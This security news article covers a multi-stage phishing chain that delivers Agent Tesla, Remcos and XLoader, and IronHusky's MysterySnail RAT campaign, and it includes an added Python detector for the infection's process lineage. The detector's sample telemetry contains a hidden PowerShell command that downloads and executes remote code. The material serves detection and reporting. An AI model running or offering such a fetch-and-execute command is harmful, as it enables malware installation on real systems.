
A new multi-stage attack has been observed delivering malware families such as Agent Tesla variants, Remcos RAT and XLoader.
“Attackers increasingly rely on such complex delivery mechanisms to avoid detection, bypass traditional sandboxes, and ensure successful delivery and execution of payloads,” Palo Alto Networks Unit 42 researcher Saqib Khanzada said in a technical write-up of the campaign.
The starting point of the attack is a deceptive email posing as an order request, which delivers a malicious 7-Zip archive attachment containing a JScript Encoded (.JSE) file.
A phishing email observed in December 2024 falsely claimed that a payment had been made and prompted recipients to review the attached order file. Launching the JavaScript payload triggers the infection sequence: the file acts as a downloader and retrieves a PowerShell script from an external server.

The PowerShell script contains a Base64-encoded payload that is decoded, written to the Windows temporary directory, and executed. This is where the chain forks: the next-stage dropper is compiled with either .NET or AutoIt.
For .NET executables, the encrypted embedded payload (an Agent Tesla variant, Snake Keylogger, or XLoader) is decoded and injected into a running “RegAsm.exe” process, a technique observed in earlier Agent Tesla campaigns.
AutoIt-compiled executables, meanwhile, add a further layer to complicate analysis. The AutoIt script inside the executable carries an encrypted payload responsible for loading the final shellcode, which injects the .NET file into the “RegSvcs.exe” process, ultimately leading to the deployment of Agent Tesla.
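The chain described above (script host running a .JSE file, PowerShell, a binary dropped in a temp directory, then RegAsm.exe or RegSvcs.exe started without an assembly argument) leaves a recognisable parent-child trail in process-creation telemetry. The following is an added example, not code from Unit 42 or from the article: it walks Sysmon Event ID 1-style records (the field names pid, ppid, image and cmdline are an assumption) and flags each stage. The sample events, including the benign Visual Studio use of RegAsm.exe that must not fire, are constructed for illustration.

```python
"""Added example: flag the .JSE -> PowerShell -> temp-directory dropper ->
RegAsm/RegSvcs chain in process-creation telemetry.  Field names (pid, ppid,
image, cmdline) are modelled on Sysmon Event ID 1 and are an assumption."""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
INJECTION_HOSTS = {"regasm.exe", "regsvcs.exe"}  # .NET utilities abused as injection targets
TEMP_DIR_RE = re.compile(r"\\(?:AppData\\Local\\Temp|Windows\\Temp)\\", re.IGNORECASE)


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def _args_after_image(cmdline):
    """Strip the (possibly quoted) image token so only real arguments remain."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[end + 1:].strip() if end != -1 else ""
    parts = s.split(None, 1)
    return parts[1].strip() if len(parts) > 1 else ""


def detect_chain(events):
    """Return (rule, pid) tuples for each stage of the chain seen in `events`."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        name = _basename(e["image"])
        pname = _basename(parent["image"]) if parent else ""
        # Stage 1: a script host that was handed a .jse file spawns PowerShell.
        if name in SHELLS and pname in SCRIPT_HOSTS and ".jse" in parent["cmdline"].lower():
            findings.append(("jse_spawns_powershell", e["pid"]))
        # Stage 2: PowerShell executes a binary it just wrote to a temp directory.
        if pname in SHELLS and TEMP_DIR_RE.search(e["image"]):
            findings.append(("powershell_runs_temp_binary", e["pid"]))
        # Stage 3: RegAsm/RegSvcs started with no assembly argument by a temp-dir
        # parent; legitimate use always passes an assembly path.
        if (name in INJECTION_HOSTS and parent and not _args_after_image(e["cmdline"])
                and TEMP_DIR_RE.search(parent["image"])):
            findings.append(("regasm_injection_host", e["pid"]))
    return findings


# Constructed sample telemetry (not real logs): one infection chain plus a
# benign RegAsm.exe run from Visual Studio that must not fire.
SAMPLE_EVENTS = [
    {"pid": 1000, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 1200, "ppid": 1000, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\Downloads\Order_4471.jse"'},
    {"pid": 1300, "ppid": 1200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c IEX (New-Object Net.WebClient).DownloadString($u)"},
    {"pid": 1400, "ppid": 1300, "image": r"C:\Users\alice\AppData\Local\Temp\upd8.exe",
     "cmdline": r'"C:\Users\alice\AppData\Local\Temp\upd8.exe"'},
    {"pid": 1500, "ppid": 1400, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"'},
    {"pid": 2000, "ppid": 1000,
     "image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
     "cmdline": "devenv.exe"},
    {"pid": 2100, "ppid": 2000, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" C:\build\Interop.dll /codebase'},
]

if __name__ == "__main__":
    for rule, pid in detect_chain(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

Each rule alone is noisy (developers run RegAsm.exe, administrators run PowerShell from wscript), so the value is in correlating the three stages by process lineage, as the chain description in the write-up suggests. The argument check in stage 3 matters: RegAsm.exe and RegSvcs.exe have no legitimate reason to start without an assembly path, which is exactly how an injector launches them as a hollow host.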

“This suggests that attackers will use multiple execution paths to increase resilience and avoid detection,” Khanzada pointed out. “The focus of attackers remains on the multi-layered attack chain, not on sophisticated obfuscation.”
“Instead of focusing on very sophisticated techniques, by stacking simple stages, attackers can create resilient attack chains that complicate analysis and detection.”
IronHusky deploys a new version of MysterySnail RAT
The disclosure came as Kaspersky detailed a campaign targeting government organizations in Mongolia and Russia with a new version of malware called MysterySnail RAT. The activity is attributed to a Chinese-speaking threat actor tracked as IronHusky.
IronHusky is assessed to have been active since at least 2017 and was previously documented in October 2021 in connection with the zero-day exploitation of CVE-2021-40449, a Win32k privilege escalation flaw, to deliver MysterySnail.
The infection begins with a malicious Microsoft Management Console (MMC) script that masquerades as a Word document from Mongolia's National Land Agency (“co-financing letter_alamgac”). The script is designed to retrieve a ZIP archive containing a lure document, a legitimate binary (“CiscoCollabHost.exe”), and a malicious DLL (“CiscoSparkLauncher.dll”).
The nature of the lure document suggests that it may have been distributed via phishing campaigns, but it is not known exactly how the MMC scripts are delivered to targets of interest.
As observed in many attacks, “CiscoCollabHost.exe” is used to sideload the DLL, an intermediary backdoor that communicates with attacker-controlled infrastructure by leveraging the open-source piping-server project.

The backdoor supports the ability to run a command shell, download and upload files, enumerate directory contents, delete files, create new processes, and exit itself. These commands are then used to deploy MysterySnail RAT.
The latest version of the malware accepts nearly 40 commands, allowing it to perform file management operations, run commands via cmd.exe, spawn and kill processes, manage services, and connect to network resources via dedicated DLL modules.
Kaspersky said that after the affected organizations took precautions to block the intrusions, the attackers were observed dropping a “repurposed and more lightweight version” of the MysterySnail RAT implant, codenamed MysteryMonoSnail.
“This version doesn’t have as many features as the MysterySnail RAT version,” the company said. “It was programmed to have only 13 basic commands, used to list the contents of a directory, write data to a file, and launch processes and remote shells.”